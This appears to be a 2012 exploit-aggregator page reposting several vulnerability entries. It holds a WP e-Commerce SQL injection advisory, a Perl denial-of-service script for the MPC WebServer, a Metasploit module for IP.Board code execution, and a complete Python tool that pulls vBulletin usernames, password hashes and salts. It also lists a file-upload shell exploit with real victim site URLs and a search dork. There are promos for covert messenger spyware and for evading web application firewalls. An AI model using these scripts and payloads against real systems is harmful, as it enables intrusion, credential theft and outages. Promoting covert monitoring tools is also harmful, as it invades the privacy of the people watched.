WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting
Software: WP e-Commerce
Software Language: PHP
Version: 3.8.9 and below
Vendor Status: Vendor contacted
Release Date: 2012-11-12
Risk: High
1. General Overview
===================
During the security audit of WP E-Commerce plugin for WordPress CMS,
multiple vulnerabilities were discovered using DefenseCode ThunderScan
PHP web application source code security analysis platform.
More information about ThunderScan PHP is available at URL:
http://www.defensecode.com/subcategory/thunderscan-8
Detailed report for each vulnerability can be found in the following PDF
report:
http://www.defensecode.com/public/wp-e-commerce_security_audit_final_report.pdf
Report has been generated by ThunderScan PHP Web Application Source Code
Security Analysis.
2. Software Overview
===================
WP e-Commerce is a popular e-commerce plugin for WordPress. Users can
use it to to sell products, downloads or services online. It has more
than 2 Million downloads on wordpress.org.
Homepage:
http://wordpress.org/extend/plugins/wp-e-commerce/
http://getshopped.org/
3. Brief Vulnerability Description
==================================
During the security analysis, ThunderScan PHP discovered multiple SQL
Injection and Cross Site Scripting vulnerabilities in WP e-Commerce plugin.
3.1. SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function: get_results($sql)
Variable: $_POST['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 699 wp-e-commerce\wpsc-core\wpsc-deprecated.php
3.2 SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function: get_results( $sql )
Variable: $_POST['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 681 wp-e-commerce\wpsc-core\wpsc-deprecated.php
3.3 SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function: get_results( $sql )
Variable: $_GET['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 525 wp-e-commerce\wpsc-includes\purchaselogs.class.php
3.4 SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function: get_results( $sql )
Variable: $_GET['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 543 wp-e-commerce\wpsc-includes\purchaselogs.class.php
3.5 SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function: get_results( $sql )
Variable: $_GET['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 534 wp-e-commerce\wpsc-includes\purchaselogs.class.php
3.6 SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function: get_results( $sql )
Variable: $_POST['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 689 wp-e-commerce\wpsc-core\wpsc-deprecated.php
3.7 Cross-Site Scripting
File: wp-e-commerce\wpsc-admin\includes\purchase-log-list-ta
ble-class.php
Function: echo ('<input type="hidden" name="m" value="' . $m . '" />')
Variable: $_REQUEST['m']
4. Solution
===========
Vendor resolved security issues in latest WP e-Commerce release. All
users are strongly advised to update WP e-Commerce plugin to the latest
available version 3.8.9.1.
# 1337day.com [2012-11-19]
Monday, November 19, 2012
WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting
Wordpress Plugins Spotlight Your Upload Vulnerability
___________.__ _________ _________
\__ ___/| |__ ____ \_ ___ \______ ______ _ ________ \_ ___ \______ ______ _ __
| | | | \_/ __ \ / \ \|_ __ \/ _ \ \/ \/ / ___/ / \ \|_ __ \/ __ \ \/ \/ /
| | | Y \ ___/ \ \___| | \( <_> ) /\___ \ \ \___| | \| ___/\ /
|____| |___| /\___ > \______ /__| \____/ \/\_//____ > \______ /__| \___ >\/\_/
\/ \/ \/ \/ \/ \/
INDO-PENDENT HACKER
http://thecrowscrew.org
#################################################################################################
Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability
Google Dork: inurl:"/wp-content/plugins/spotlightyour/"
Date: 18/11/2012
Locations: Banjarmasin, Indonesia
Author: ovanIsmycode & walangkaji
Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org
Software Link: http://www.spotlightyour.com
#################################################################################################
[+] POC
Exp. Target :
- http://domain.com/wp-content/plugins/spotlightyour/
Exploit :
- /monetize/upload/index.php
Shell Access :
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php
Ending :
- Fraksi Bejoug a.k.a Kalam Saheru
Saparatoss Blank Blank
awkwkwkwk :v
http://beautyexo.com/wp-content/plugins/spotlightyour/monetize/upload/
http://www.promogotion.com/wp-content/plugins/spotlightyour/monetize/upload/
http://shopping.businessminister.com/wp-content/plugins/spotlightyour/monetize/upload/
#################################################################################################
Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7,
penjamoen, -=[The Crows Crew]=-, Indonesian Hacker
thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org
########################################[end]####################################################
# 1337day.com [2012-11-19]
Media Player Classic XSS / Denial Of Service
==========================================================================================
MPC (Media Player Classic) WebServer Multiple Vulnerabilities
==========================================================================================
:------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : MPC (Media Player Classic) WebServer Multiple Vulnerabilities
: # Date : 16 November 2012
: # Author : X-Cisadane
: # Download : http://mpc-hc.sourceforge.net/downloads/ OR Download K-Lite Mega Codec Pack http://codecguide.com/download_mega.htm
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : XSS Vulnerability and Remote Denial of Service Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:------------------------------------------------------------------------------------------------------------------------------------:
WHAT IS MPC WebServer?
======================
Media Player Classic (MPC) is a compact free software media player for Microsoft Windows. The application mimics the look and feel of the old,
light-weight Windows Media Player 6.4 but uses a completely different codebase, integrating most options and features found in modern media players.
Media Player Classic (MPC) WebServer is part of Media Player Classic features that is a web based Remote control. You can controlling Media Player Classic from your Web Browser.
HOW TO ACTIVATE MPC WebServer?
==============================
Make sure you have installed Media Player Classic or K-Lite Mega Codec Pack. Run your Media Player Classic, click 'View' Menu from the Menu Bar then choose 'Options...'.
In the Options Window, choose Web Interface. Enable “Listen on port”, Disable “Allow access from localhost only”.
You can change the port it listens on but that’s optional (default is 13579). Apply and click 'Launch in web browser...' Or Access it from http://localhost:13579/ OR http://IP:13579/.
PIC MPC WebServer : http://i48.tinypic.com/33xfomg.png
PROOF OF CONCEPT
=================
[1] Non Persistent XSS (Tested On Mozilla Firefox 16.0.2)
Vulnerable URL : http://IP:Port/browser.html?path=[XSS]
Example : http://localhost:13579/browser.html?path=<script>alert("XSS")</script>
PIC XSS : http://i45.tinypic.com/4j3uz4.png
[2] Remote Denial of Service (Using Perl Script)
C:\xampp\perl\bin>perl exploitmpc.pl 127.0.0.1 13579
*=============================================================*
* --- MPC WebServer Remote Denial Of Service ---*
* --- By : X-Cisadane ---*
* --- ------------------------------------------------ ---*
* --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*
* --- ---*
*=============================================================*
Ex : perl exploitmpc.pl 127.0.0.1 13579
Default Port for MPC Web Server is 13579
Please Wait Till Buffer is Done
Attacking the Target, Please Wait Till Pwned
PIC Remote DoS : http://i46.tinypic.com/15egs5j.png
-------------------------------- [ Code ] --------------------------------------------
#!/usr/bin/perl
use IO::Socket::INET;
use Getopt::Std;
use Socket;
my $SOCKET = "";
$loop = 1000;
$ip = $ARGV[0];
$port = $ARGV[1];
if (! defined $ARGV[0])
{
print "\t*=============================================================*\n";
print "\t* --- MPC WebServer Remote Denial Of Service ---*\n";
print "\t* --- By : X-Cisadane ---*\n";
print "\t* --- ------------------------------------------------ ---*\n";
print "\t* --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*\n";
print "\t* --- ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
print "Default Port for MPC Web Server is 13579\n";
exit;
}
print "\t*=============================================================*\n";
print "\t* --- MPC WebServer Remote Denial Of Service ---*\n";
print "\t* --- By : X-Cisadane ---*\n";
print "\t* --- ------------------------------------------------ ---*\n";
print "\t* --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*\n";
print "\t* --- ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
print "Default Port for MPC Web Server is 13579\n";
print "\n";
print " Please Wait Till The Buffer is Done\n";
my $b1 = "\x41" x 100000000;
$iaddr = inet_aton($ip) || die "Unknown host: $ip\n";
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname('tcp') || die "getprotobyname: $!\n";
print "\n";
print " Attacking the Target, Please Wait Till Pwned \n";
for ($j=1;$j<$loop;$j++) {
socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
connect(SOCKET,$paddr) || die "Connection Failed: $! .........Disconnected!\n";
$DoS=IO::Socket::INET->new("$ip:$port") or die;
send(SOCKET,$b1, 0) || die "failure sent: $!\n";
print $DoS "stor $b1\n";
print $DoS "QUIT\n";
close $DoS;
close SOCKET;
}
# exit :
# 1337day.com [2012-11-19]
Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution',
'Description' => %q{
This module exploits a php unserialize() vulnerability in Invision IP.Board
<= 3.3.4 which could be abused to allow unauthenticated users to execute arbitrary
code under the context of the webserver user.
The dangerous unserialize() exists in the '/admin/sources/base/core.php' script,
which is called with user controlled data from the cookie. The exploit abuses the
__destruct() method from the dbMain class to write arbitrary PHP code to a file on
the Invision IP.Board web directory.
The exploit has been tested successfully on Invision IP.Board 3.3.4.
},
'Author' =>
[
'EgiX', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'sinn3r' # PhpEXE tekniq & check() method
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-5692' ],
[ 'OSVDB', '86702' ],
[ 'BID', '56288' ],
[ 'EDB', '22398' ],
[ 'URL', 'http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Space' => 8000, #Apache's limit for GET
'DisableNops' => true
},
'Targets' => [ ['Invision IP.Board 3.3.4', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 25 2012'
))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/forums/"])
], self.class)
end
def base
base = target_uri.path
base << '/' if base[-1, 1] != '/'
return base
end
def check
res = send_request_raw({'uri'=>"#{base}index.php"})
return Exploit::CheckCode::Unknown if not res
version = res.body.scan(/Community Forum Software by IP\.Board (\d+)\.(\d+).(\d+)/).flatten
version = version.map {|e| e.to_i}
# We only want major version 3
# This version checking is based on OSVDB's info
return Exploit::CheckCode::Safe if version[0] != 3
case version[1]
when 1
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
when 2
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 3)
when 3
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
end
return Exploit::CheckCode::Safe
end
def on_new_session(client)
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin
print_warning("#{@peer} - Deleting #{@upload_php}")
client.fs.file.rm(@upload_php)
print_good("#{@peer} - #{@upload_php} removed to stay ninja")
rescue
print_error("#{@peer} - Unable to remove #{f}")
end
end
end
def exploit
@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"
# get_write_exec_payload uses a function, which limits our ability to support
# Linux payloads, because that requires a space:
# function my_cmd
# becomes:
# functionmy_cmd #Causes parsing error
# We'll have to address that in the mixin, and then come back to this module
# again later.
php_payload = get_write_exec_payload(:unlink_self=>true)
php_payload = php_payload.gsub(/^\<\?php/, '<?')
php_payload = php_payload.gsub(/ /,'')
db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}"
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi(
{
'uri' => "#{base}index.php?#{php_payload}",
'method' => 'GET',
'cookie' => "member_id=#{Rex::Text.uri_encode(db_driver_mysql)}"
})
if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}")
return
end
print_status("#{@peer} - Executing the payload #{@upload_php}")
res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"})
if res
print_error("#{@peer} - Payload execution failed: #{res.code}")
return
end
end
end
IMMonitor Yahoo Messenger Spy v2.2.9.(Full)
IMMonitor Yahoo Messenger Spy cho phép bạn theo dõi, khoá lại hoặc ghi lại các đoạn đối thoại chat trên Yahoo Messenger từ xa. Nếu con cái bạn (hay vợ, chồng bạn!) đang dành quá nhiều thời gian để chat trên Yahoo Messenger? hay bạn nghi ngờ họ dính líu tới những cuộc thoại nguy hiểm, Nếu vậy thì IMMonitor Yahoo Messenger Spy là lựa chọn tốt nhất cho bất kì ai cần thông tin về chuyện này, thật nhanh chóng và bí mật. Nó dễ sử dụng và không cần phải cài đặt trên máy đích cần theo dõi. Sẽ không ai biết rằng các cuộc đối thoại trên Yahoo Messenger của họ đang bị khoá hay ghi lại và nó sẽ không bao giờ ngừng hoạt động trừ phi bạn đóng nó lại.
READ MORE »
SQL Injection - Useful Functions - Tutorial
Here are some useful function that you can use to speed up your injection and/or evade some WAFs.
If group_concat() or concat() are not available (or you can't bypass a WAF that filters out these functions) you can try and use this:
READ MORE »
If group_concat() or concat() are not available (or you can't bypass a WAF that filters out these functions) you can try and use this:
READ MORE »
Exploiting Java Applet JAX-WS Remote Code Execution
Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada Java Applet JAX-WS Remote Code Execution descubierta por @_juan_vazquez_ la cual afecta a la versión 1.7.0_07-b10 y anteriores.
READ MORE »
[XSS] Soha.vn
- Site: http://my.soha.vn
- Exploit: Cross Site Scripting (XSS) Stored.
- Đánh giá: Nghiêm trọng.
- Khai thác: Inject Script redirect, steal cookies, deface script...
- Tình trạng: (Chưa liên hệ).
vBulletin vBay <=1.1.9 Error-Based SQL Injection
#!/usr/bin/env python -W ignore::DeprecationWarning
"""
VBay <= 1.1.9 - Remote Error based SQL Injection
~ Author: Dan UK
~ Contact: http://www.hackforums.net/member.php?action=profile&uid=817599
~ Date: 10/11/12
DETAILS
Among a couple of other unsanitized parameters used within an INSERT INTO statement
on line 424-460 of /upload/vbay.php, the "type" variable can be used to exploit this
using error based sql injection, making it possible to grab anything the user wants
from the vbulletin database (and any others if accessible).
As said above, the affected file is /upload/vbay.php.
On line 418, we can see the $vbulletin->input variable "type"
being assigned with the datatype NO_HTML. Using this data type
allows malicious attacks to still be executed.
At line 448, it is used within the insert into statement,
without any sanitization.
POC
- You will need to register an account.
- Go to [site]/vbay.php?do=postauction.
- Modify your post data using a tool such as live http headers, or setting it directly
using a tool such as curl/wget to grab the source.
- Set the value of "type=" to something that will cause an error, such as a single tick.
Example: POST type='
- If, when you view the source, you get a vbulletin error message surrounded within
comments, then it's possible to go ahead. If not, blind is the way forward.
If error based is possible for you, you could either just simply look at some tutorials
and go from there, or run the script below which will grab the details for the user specified.
Have fun.
"""
from optparse import OptionParser, OptionGroup
from argparse import OPTIONAL
import cookielib, urllib, urllib2, httplib
import sys, md5, urlparse, re
"""
OPTION PARSER/USAGE
"""
usage = "./%prog [options]\n"
usage += "-h or --help for more help."
# Required options
parser = OptionParser(usage=usage)
parser.add_option("-u", dest="username",
help="Working username to the target forum.")
parser.add_option("-p", dest="password",
help="Working password to the target forum.")
parser.add_option("--host", dest="forumpath",
help="FULL path to the vbulletin forum.")
# Optional Options
optional = OptionGroup(parser, "Optional arguments")
optional.add_option("-f", dest="userid",
help="User ID to grab. Default is 1.", metavar="USERID",
default="1")
optional.add_option("-s", dest="prefix",
help="Set the prefix of the vBulletin forum\
Default is null.", default="")
optional.add_option("-g", "--grab-prefix", dest="grabprefix",
help="Grab the tables prefix.", default=False,
action="store_true")
parser.add_option_group(optional)
(options, args) = parser.parse_args()
if not options.forumpath:
parser.error('[-] No forum path given.')
if not options.username:
parser.error('[-] No username given.')
if not options.password:
parser.error('[-] No password given.')
"""
HEADER
"""
def Header():
header = """
# # # # # # # # # # # # # # # # # #
# VBay <=1.1.9 SQL Injection 0day #
# By Dan_UK #
# # # # # # # # # # # # # # # # # #\n"""
return header
"""
LOGIN AND EXTRACT NEEDED COOKIES
"""
def loginForum(forum, username, password):
md5pass = md5.md5(password).hexdigest()
postdata = urllib.urlencode({
'do':'login',
'vb_login_md5password':md5pass,
'vb_login_username':username,
'cookieuser':'1'
})
cookie_jar = cookielib.CookieJar()
handeler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
handeler.open(forum + "login.php?do=login", postdata)
for cookie in cookie_jar:
if "bbsessionhash" in str(cookie):
return cookie_jar
"""
CHECK VBAY EXISTS
"""
def get_server_status_code(forum):
host, path = urlparse.urlparse(forum)[1:3]
try:
conn = httplib.HTTPConnection(host)
conn.request('HEAD', path)
return conn.getresponse().status
except StandardError:
return None
def checkExists(forum):
good_codes = [httplib.OK, httplib.FOUND, httplib.MOVED_PERMANENTLY]
return get_server_status_code(forum + "vbay.php") in good_codes
"""
CHECK DEBUG MODE ENABLED
"""
def checkVuln(forum, cookie_jar):
payload = {
"POST":
urllib.urlencode({"type":"'"}),
"SCRIPT":"vbay.php?do=postauction"
}
try:
handeler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
resp = handeler.open(forum + payload["SCRIPT"], payload["POST"])
except urllib2.HTTPError as e:
e_mesg = e.read()
if "MySQL Error" in e_mesg:
return True
"""
GRAB PREFIX
"""
def grabPrefix(forum, cookie_jar):
payload = {
"SQL":urllib.urlencode({"type":"'"}),
"SCRIPT":"vbay.php?do=postauction"
}
try:
handler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
resp = handler.open(forum + payload["SCRIPT"], payload["SQL"])
except urllib2.HTTPError as e:
e_mesg = e.read()
prefix = re.search('INTO(.*)vbay_items', e_mesg).group(1)
return prefix
"""
GRAB INFO
"""
def grabInfo(forum, cookie_jar, prefix, userid):
# 0x2564656c696d312125 = "%delim1!%"
payload = {
"SQL":
urllib.urlencode({
"type":"' and (select 1 from (select count(*),concat((select(select concat(cast(concat(0x2564656c696d312125,COL_NAME,0x2564656c696d312125) as char),0x7e)) from " + str(prefix) + "user WHERE userid=" + str(userid) + " limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or ''='",
}),
"COLS": ["username", "password", "salt"],
"SCRIPT":"vbay.php?do=postauction"
}
info = []
for col in payload["COLS"]:
print "[!] Grabbing the %s" % col
try:
handler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
resp = handler.open(forum + payload["SCRIPT"], payload["SQL"].replace("COL_NAME", col))
except urllib2.HTTPError as e:
e_mesg = e.read()
info.append(e_mesg.split("%delim1!%")[1].strip("\n"))
return info
"""
MAIN
"""
def main():
username = options.username
password = options.password
forum = options.forumpath
userid = options.userid
prefix = options.prefix
if forum.lower()[:7] != "http://":
if forum.lower()[:8] == "https://":
forum = forum.replace("https://", "http://")
if forum[-1:] != "/":
forum = forum + "/"
print Header()
print "[!] Trying to login to: " + forum
if loginForum(forum, username, password):
cookies = loginForum(forum, username, password)
print "[+] Login works."
else:
print "[-] Login doesn't work. (" + username + ":" + password + ")"
print "[-] Exiting."
sys.exit()
print "\n[!] Checking if vBay is installed.."
if (checkExists(forum)):
print "[+] vBay was found. Continuing with exploit."
else:
print "[-] vBay could no be found. (" + forum + "/vbay.php)"
print "[-] Exiting."
sys.exit()
print "\n[!] Checking if debug mode is enabled.."
if checkVuln(forum, cookies):
print "[+] Debug mode is enabled, exploit is possible."
if options.grabprefix == True:
print "\n[!] Grabbing prefix."
print "[+] Prefix found:" + grabPrefix(forum, cookies)
sys.exit()
print "\n[!] Grabbing info.\n"
info = grabInfo(forum, cookies, prefix, userid)
print "\n[+] Formatting for ease of view."
print "\n\n[+] Username: " + info[0]
print "[+] Password: " + info[1]
print "[+] Salt: " + info[2]
print "\n\nThanks for using my tool."
if __name__ == "__main__":
main()
Tội phạm lừa đảo - Phần VI: Đánh cắp nhận dạng
Bạn làm việc chăm chỉ cần mẫn hàng ngày chỉ với mong muốn kiếm sống nuôi lấy bản thân. Bạn phải hết sức dè sẻn trong chi tiêu hàng ngày, và bạn chỉ đủ dư một khoản tiết kiệm trong tài khoản. Chuyện gì sẽ xảy ra nếu ai đó sử dụng tên bạn, nhân dạng của bạn, số tài khoản của bạn để thực hiện những vụ mua bán trời ơi đất hỡi, và bạn chợt nhận thấy mình phải gánh một món nợ không hề nhỏ? Mọi chuyện có thể còn trầm trọng hơn thế, khi tên lừa đảo sử dụng chúng vào mục đích phi pháp.
READ MORE »
Tội phạm lừa đảo - Phần V: Rửa tiền (Phần tiếp theo)
Rửa tiền tham ô: Eddie Antar
Vào thập kỉ 80, Eddie Antar, chủ sở hữu của Crazy Eddie’s Electronics, đã lấy đi hàng triệu dollar của công ty và giấu chúng khỏi IRS (Internal Revenue Service - cơ quan phụ trách về thuế thu nhập ở Mỹ). Đây là một kế hoạch độc đáo, tuy nhiên, Antar và những người đồng chủ mưu đã quyết định rằng sẽ tốt hơn nếu tiền quay lại công ty dưới danh nghĩa lợi nhuận. Điều này sẽ làm tăng thêm lượng tài sản hiện có của công ty khi chuẩn bị cho IPO (Initial Public Offering – phát hành cổ phiếu lần đầu). Trong nhiều chuyến đi của mình tới Israel, Antar đã dắt trong mình và trong vali tổng cộng hàng triệu dollar. Dưới đây là tóm tắt về cách thức rửa tiền được Antar sử dụng:
READ MORE »
Tội phạm lừa đảo - Phần V: Rửa tiền
Tháng 10 năm 2005, Nghị sĩ Tom Delay của Mỹ bị buộc tội có liên quan tới một vụ án rửa tiền và rồi bị giáng chức xuống thành House Majority Leader - người đứng đầu Hạ nghị viện. Rửa tiền là một hành vi nghiêm trọng – trong năm 2001, ở Mỹ đã khởi tố gần 900 vụ rửa tiền với mức án trung bình 6 năm tù giam. Sự phát triển tài chính toàn cầu khiến cho việc rửa tiền trở nên dễ hơn bao giờ hết – những đất nước có bank-secrecy laws (luật bí mật ngân hàng) được kết nối trực tiếp với đất nước có bank-reporting laws (luật báo cáo ngân hàng – nd), từ đó những kẻ nặc danh có khả năng chuyển những khoản tiền “bẩn” từ đất nước này sang đất nước khác để sử dụng.
READ MORE »